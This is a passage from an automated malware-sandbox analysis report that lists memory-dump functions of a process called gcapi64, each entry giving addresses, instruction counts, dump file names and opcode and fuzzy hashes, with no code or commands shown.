                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cd1db59ba2fee80c10283e5e1b8d40b2a44433819c6f07911099c83ade41e05
                                                                  • Instruction ID: c5c3101c2066e09e36b0fb24e8597d994cc223a507419c5e9cf74092d2b6eddc
                                                                  • Opcode Fuzzy Hash: 1cd1db59ba2fee80c10283e5e1b8d40b2a44433819c6f07911099c83ade41e05
                                                                  • Instruction Fuzzy Hash: 9A31E821B0A9494FD795E7AC98295B837D2EFD825034A01F6E419CF2B7ED19BD424340
                                                                  Function 00007FFD9B7A1CF6 Relevance: .1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 800c8528980bb0616101585b18954d957c9d6ccd23a27044b934dd5a03b2e230
                                                                  • Instruction ID: 2aadfd40a28ea0c48457a06acad2497fce2361763b75a29a765f89df62a440d4
                                                                  • Opcode Fuzzy Hash: 800c8528980bb0616101585b18954d957c9d6ccd23a27044b934dd5a03b2e230
                                                                  • Instruction Fuzzy Hash: 5731E922B0FB8A0FFBF9A66808B51B875C1DF56250B0901BAD45DC75F3EC086D40E341
                                                                  Function 00007FFD9B6DFF65 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6775e2a77a687333a067006287bb9796610b78c0e25b55a5e8b9d6d2a97b58e6
                                                                  • Instruction ID: fd8496491a493fd0fa437fcf562c195f10aebbe63431903ca2ef9347c3ca4935
                                                                  • Opcode Fuzzy Hash: 6775e2a77a687333a067006287bb9796610b78c0e25b55a5e8b9d6d2a97b58e6
                                                                  • Instruction Fuzzy Hash: 7831B231E1964D9AEB51AFA8A8596ED7BE0FF04308F4001B6E42CCA0A6DE346294C741
                                                                  Function 00007FFD9B7A0922 Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a8b25ae5b0206f077455c933d28e4629813ea88cc7a79e16d65c86338cd3a46a
                                                                  • Instruction ID: 32fe95fe208ad1b12f8a5fcbd7e10de79da7989ae3b5adb5fab068cb0d88aefa
                                                                  • Opcode Fuzzy Hash: a8b25ae5b0206f077455c933d28e4629813ea88cc7a79e16d65c86338cd3a46a
                                                                  • Instruction Fuzzy Hash: 9131D462F0FB9B4BF7F596A818B51B8B5C1AF51B50B4A0ABAD49CD71F3DD086C014342
                                                                  Function 00007FFD9B6DBE85 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42a79c18fce4253c2285943d0dc20ded2be5960d1b5a9f7389c430a858c51fef
                                                                  • Instruction ID: 5490b6de383cf2f8e0d12c759f16ac037392f920d4760b9febde3c138b425e48
                                                                  • Opcode Fuzzy Hash: 42a79c18fce4253c2285943d0dc20ded2be5960d1b5a9f7389c430a858c51fef
                                                                  • Instruction Fuzzy Hash: A531FC21B0A54D4FEB94E7BC98695B837D1EFD924074A01F6E519CF2B7EE19BC014340
                                                                  Function 00007FFD9B6DBB14 Relevance: .1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69fcf74ef6b4e458ba2989fef7b7604649fc9c9a71b6282eef8b7484ee8ce1cc
                                                                  • Instruction ID: 08310df42667319efe4994c4d98933c3dc30ff43be4e4749c2405a2e5fdfb357
                                                                  • Opcode Fuzzy Hash: 69fcf74ef6b4e458ba2989fef7b7604649fc9c9a71b6282eef8b7484ee8ce1cc
                                                                  • Instruction Fuzzy Hash: 3E310521B0E6C94FE796A7BC48685643FD1DFD625070A02F6D058CF1B7ED08AC068711
                                                                  Function 00007FFD9B7A4D27 Relevance: .1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c27c34ace41798b12c8dea4d605f6e756644740cb6db52e228f6a300e4638484
                                                                  • Instruction ID: 8cbc1de3953257aafc2b0b87f8419684f35f4744a46cfa32d29a06a158395d61
                                                                  • Opcode Fuzzy Hash: c27c34ace41798b12c8dea4d605f6e756644740cb6db52e228f6a300e4638484
                                                                  • Instruction Fuzzy Hash: 4D31C671E09A5E4FEFA4DF9898553E977A1FF58301F10027AD408E32A1CE395A858B80
                                                                  Function 00007FFD9B6D2B80 Relevance: .1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d675e166110fbfd7b0c135a3e5c7fb4f7269c124fc6e9a42dd4533a9b65a495f
                                                                  • Instruction ID: 3fd2b4d9d00328ec59eb43ef1ad58424a6f1842410e4cea0ac0c1a35c1900389
                                                                  • Opcode Fuzzy Hash: d675e166110fbfd7b0c135a3e5c7fb4f7269c124fc6e9a42dd4533a9b65a495f
                                                                  • Instruction Fuzzy Hash: A3310921B0EE8E0FDB95DB6C8C686657BD1EFA9214B4502FBD46CCB1E7D955EC058300
                                                                  Function 00007FFD9BA1DAFA Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8a2d40786b563f45465130af32eff9b94582ee1d70fc6f152468dc50c3fb1ae
                                                                  • Instruction ID: 186b18ba6dbd9f93061d406606bc8f35d4cd6115cf45ddd2099dcd32c096f35e
                                                                  • Opcode Fuzzy Hash: b8a2d40786b563f45465130af32eff9b94582ee1d70fc6f152468dc50c3fb1ae
                                                                  • Instruction Fuzzy Hash: 6521293170DA4D1FE6B8975C68667B537C1DB86220F4500BEE4CEC31B2ED55BC428386
                                                                  Function 00007FFD9B6D7500 Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01d4a06e64b8e6f7c7303676e5f64be7e56029dda6c08ad9e4baad9e42ffd9bd
                                                                  • Instruction ID: 1aabd78dd3431045beb6749d6e220192f03a2201c095f2ba5f49b45668306f36
                                                                  • Opcode Fuzzy Hash: 01d4a06e64b8e6f7c7303676e5f64be7e56029dda6c08ad9e4baad9e42ffd9bd
                                                                  • Instruction Fuzzy Hash: 5821A421B1690D4FEB98F7BDA86D97833D2EFDC25174501B9E51DCB2B6EE25AC014340
                                                                  Function 00007FFD9B6D7378 Relevance: .1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d418935c51ceb3b6146f3213b704cebd96c2c0573f7411ab5db3b99c7143e2d8
                                                                  • Instruction ID: d6b229832f9ea6a8cd73d7256e7f4bb8db1f80ae21d7abc97a89a482cdf1c447
                                                                  • Opcode Fuzzy Hash: d418935c51ceb3b6146f3213b704cebd96c2c0573f7411ab5db3b99c7143e2d8
                                                                  • Instruction Fuzzy Hash: B9318B31A0E15D0FE3359AA88C60B7137DAEFCA304F0A06BAD15CCF1E2D91CBA458350
                                                                  Function 00007FFD9BA10305 Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a7260c7a3ba6b42485a720f6dd94a32a4385a128b32cae6355b4b537680d7c8
                                                                  • Instruction ID: 41f3efff28f436abfc8bf5f81ccc30fc628d49e9f9a291be0817d8e7dffab45d
                                                                  • Opcode Fuzzy Hash: 2a7260c7a3ba6b42485a720f6dd94a32a4385a128b32cae6355b4b537680d7c8
                                                                  • Instruction Fuzzy Hash: 0021292061DA990FE7A1D72CA464AB17FE1DFA5220F0D05BBE8C8C71B2D959D9C1C349
                                                                  Function 00007FFD9BA132E4 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 553707bc855a0b4e419ae4f3f141e3340945614b141e1fa420aeb6f894039f3f
                                                                  • Instruction ID: de048a18f530a15e8b83b1809a91783518883c16b34c290716b91ba1460d861b
                                                                  • Opcode Fuzzy Hash: 553707bc855a0b4e419ae4f3f141e3340945614b141e1fa420aeb6f894039f3f
                                                                  • Instruction Fuzzy Hash: BD21D331B1BF098FE6A9A778642527473E2EF99350B5501BDD04AC32A7DE39AD428340
                                                                  Function 00007FFD9B6D5539 Relevance: .1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c76d1c35a4bdc6eee8c440a4cf76beb052d6e9130354ba972e7f0536c1e730bc
                                                                  • Instruction ID: 17a5962d445dcf990164c17f18dbb52dfe245ac9fa54b32d5a8e91c5e82e81d4
                                                                  • Opcode Fuzzy Hash: c76d1c35a4bdc6eee8c440a4cf76beb052d6e9130354ba972e7f0536c1e730bc
                                                                  • Instruction Fuzzy Hash: 3D31A06690F7D94FD7239B748C312A87FA1AF93250F0A42EBD495CF0F3D91929498352
                                                                  Function 00007FFD9B6DB1E9 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69c0261d0429cd44823800385c769c920c46ab330d58ac3f67f174103d86f981
                                                                  • Instruction ID: ed21ae0ef263a8522ca810f26153d044d2dc9cdb83cd7c3dccbfcd0b61919b4f
                                                                  • Opcode Fuzzy Hash: 69c0261d0429cd44823800385c769c920c46ab330d58ac3f67f174103d86f981
                                                                  • Instruction Fuzzy Hash: 6E21E662F0F6C90FE7668AA85C353787F91AFD1210F4E02FBD459CF1E6E91929414301
                                                                  Function 00007FFD9B7A4E28 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb1d189a1fdff9c1e662d8abea91e06689c3f4a244c47bd958fecc4d84bd3ee5
                                                                  • Instruction ID: c858e996231bb2dfab21cd6c17925b2cd6e858ac0e46bbd521aa773cc546319e
                                                                  • Opcode Fuzzy Hash: cb1d189a1fdff9c1e662d8abea91e06689c3f4a244c47bd958fecc4d84bd3ee5
                                                                  • Instruction Fuzzy Hash: 62215E71E0560D9EEF90DF9894557EC77B1FBA8311F104276C409E2260DA3969868B90
                                                                  Function 00007FFD9B6D48E8 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e497aacbd2e1cba59b6542af9e5c0981acb8d4df7eed63d3d22584d93df673a
                                                                  • Instruction ID: 1106a1b423f4a3bb1a0466e4de41ae2677136cf4c49286c5f99d3a88c198534c
                                                                  • Opcode Fuzzy Hash: 5e497aacbd2e1cba59b6542af9e5c0981acb8d4df7eed63d3d22584d93df673a
                                                                  • Instruction Fuzzy Hash: 86212633B0EA4E0BE721AAA58CA17E57791EF94350F02027AD52DCF0E2EC1D7D058241
                                                                  Function 00007FFD9B6D4A07 Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 916af892d5b837ff964405873fe32defb162d10aaa951f6630207e3baa7c9628
                                                                  • Instruction ID: 65f66061423d0f42dd3d2c2efac3358a9f1c589c4df73094aa1eed1224c923ab
                                                                  • Opcode Fuzzy Hash: 916af892d5b837ff964405873fe32defb162d10aaa951f6630207e3baa7c9628
                                                                  • Instruction Fuzzy Hash: 0711366370ED894FD7A4DEAC48A5AA03791DFA4350B1A02BED02DCB1FBED14BD458741
                                                                  Function 00007FFD9B6DB175 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e141591f78b5c5c25338b189dd458269fb536c7feaacb259cb9897e6e7cfe5d
                                                                  • Instruction ID: b2fea5247e395a47ec0af28b6e4d3f5b9a0d55331824932b7bb8efd8d804b05d
                                                                  • Opcode Fuzzy Hash: 1e141591f78b5c5c25338b189dd458269fb536c7feaacb259cb9897e6e7cfe5d
                                                                  • Instruction Fuzzy Hash: 77110462A0E7C91FD7529BA86C212E47FB0DFD3260F0902FBD4A4CE0A7E91529568341
                                                                  Function 00007FFD9B6DC428 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6206964b3e1e213fbcdf6f9f5996ba64c78c3f47422a16e34ba5bfcc098704e1
                                                                  • Instruction ID: 98ee5cd6a32cc2e0d54585f3d0956e61c6f995485e43572bbd3ccb9d0cc2211a
                                                                  • Opcode Fuzzy Hash: 6206964b3e1e213fbcdf6f9f5996ba64c78c3f47422a16e34ba5bfcc098704e1
                                                                  • Instruction Fuzzy Hash: 0A116331A0D6498FEB59CE58D87076433E2EFD9314F1601ACE45ECB2D2DA35A912C604
                                                                  Function 00007FFD9B6DDCA5 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6399ac2c2742726c7499f45bbd38374a834c9bf35f233e593f3f656d78a5c376
                                                                  • Instruction ID: 6a13c8a8bc024d9e7e62ee031022dbbfb3e299bcdea3386543cdb1ff150bcdf1
                                                                  • Opcode Fuzzy Hash: 6399ac2c2742726c7499f45bbd38374a834c9bf35f233e593f3f656d78a5c376
                                                                  • Instruction Fuzzy Hash: 5F11CA31B095494FD764EF78C861BA873D2FF85324B4506B9E41ACB2E7DD28A8418781
                                                                  Function 00007FFD9B6D8D64 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91c9e4bc89b6cc097ef887fcbdc2ba6b18109f57d1ecc8464bc1f72101b280ca
                                                                  • Instruction ID: 2f1516176a2af8e1b2389d270227f809fc03372127e981169a8528124d611ac2
                                                                  • Opcode Fuzzy Hash: 91c9e4bc89b6cc097ef887fcbdc2ba6b18109f57d1ecc8464bc1f72101b280ca
                                                                  • Instruction Fuzzy Hash: DC11E372A0F6494BEB668A689C756A437D2AFE1340F1602E9D49ACB1E3ED2865018700
                                                                  Function 00007FFD9B6DBBE9 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23eae2742f576456518cc5253197529c82f48ba2e4ca7e3ffc0aa5cfd36fdac3
                                                                  • Instruction ID: 41269916f32677d88ac9ea886c7ff0b914da91fd8a96edb674650d0335e34f73
                                                                  • Opcode Fuzzy Hash: 23eae2742f576456518cc5253197529c82f48ba2e4ca7e3ffc0aa5cfd36fdac3
                                                                  • Instruction Fuzzy Hash: CE01B111F0B5890FEB55A7B848259B937D19FC621174A43F6E029CF1ABED0CB9024752
                                                                  Function 00007FFD9B7A51C9 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7cb8e806dab3a335d767b0df3c028299b769846fe6d7b9674bbc65a8817b9b37
                                                                  • Instruction ID: 2c1291d2d23f3c5a479d049409b325ca4c32bafe8b93c4712e2a0eb1ac3eb1ec
                                                                  • Opcode Fuzzy Hash: 7cb8e806dab3a335d767b0df3c028299b769846fe6d7b9674bbc65a8817b9b37
                                                                  • Instruction Fuzzy Hash: 82112171E0561E8EEFA4DF98D4557ED77B1FF98311F100276C00DE2161CA3969868B90
                                                                  Function 00007FFD9B6D72D0 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 904ac90745440ff02e74716011d0949ab16717f14438a0d42413142de70ca99a
                                                                  • Instruction ID: 933f91855fd6870aa64df64b0e3933c4e30b3ef2a91d16305d26e3deff0754e4
                                                                  • Opcode Fuzzy Hash: 904ac90745440ff02e74716011d0949ab16717f14438a0d42413142de70ca99a
                                                                  • Instruction Fuzzy Hash: 94012831B0F6480BE76596B86C213A976D1EFC5314F5606FEE40DCB2D6E82D59818382
                                                                  Function 00007FFD9B6D33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed955ab84566f350edfa8ffa6eb72b3ad735ce34d23cd65ab708e264438b9f4e
                                                                  • Instruction ID: 0c6d2c360707e00c7e88e4e6656347cd16ed5dd2fb8571ff3f9b6faa4a7628a3
                                                                  • Opcode Fuzzy Hash: ed955ab84566f350edfa8ffa6eb72b3ad735ce34d23cd65ab708e264438b9f4e
                                                                  • Instruction Fuzzy Hash: A301A73020CB0C4FD748EF0CE451AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B7A53A7 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 426113adb10dd97fceafca4ed50fffc522487c1898f1b30b9fe6d092832ad406
                                                                  • Instruction ID: 5ca84b2236029b2de391ac412a69c8c73fb1c1f791d814b54cdac9addbc0b2ca
                                                                  • Opcode Fuzzy Hash: 426113adb10dd97fceafca4ed50fffc522487c1898f1b30b9fe6d092832ad406
                                                                  • Instruction Fuzzy Hash: F6013071E0561E8EEFA4DB98D4557ED77B1FF98301F100276C00DE21A0CA396A868B90
                                                                  Function 00007FFD9B7A52BB Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2514785288.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b7a0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66f96c4e010451334f2e2e1b876e7e02751e733f08fe18030fa71842ce9e9656
                                                                  • Instruction ID: 5ca84b2236029b2de391ac412a69c8c73fb1c1f791d814b54cdac9addbc0b2ca
                                                                  • Opcode Fuzzy Hash: 66f96c4e010451334f2e2e1b876e7e02751e733f08fe18030fa71842ce9e9656
                                                                  • Instruction Fuzzy Hash: F6013071E0561E8EEFA4DB98D4557ED77B1FF98301F100276C00DE21A0CA396A868B90
                                                                  Function 00007FFD9B6DA5D2 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6add95393c8787a30e9610aca2ecfcab4b892755b1a898fc51074ad970517b7
                                                                  • Instruction ID: 07b13715dafd1ff0f88244901eede2f565dccb3e6222fa59a724ac3f29149932
                                                                  • Opcode Fuzzy Hash: c6add95393c8787a30e9610aca2ecfcab4b892755b1a898fc51074ad970517b7
                                                                  • Instruction Fuzzy Hash: 8511E971B0FA894FE3618A688C303A47B929F91350F0A02FAD0598F1E3ED2D65454701
                                                                  Function 00007FFD9BA10BA1 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16bc09b9737ac0fe32f2e59e1a0969c0f99e9274034b2500a6f9de1c67344eac
                                                                  • Instruction ID: a0897c6f69d7fe3a50a82e138f4397b5717c92d1cb0ce461687112cb2694099a
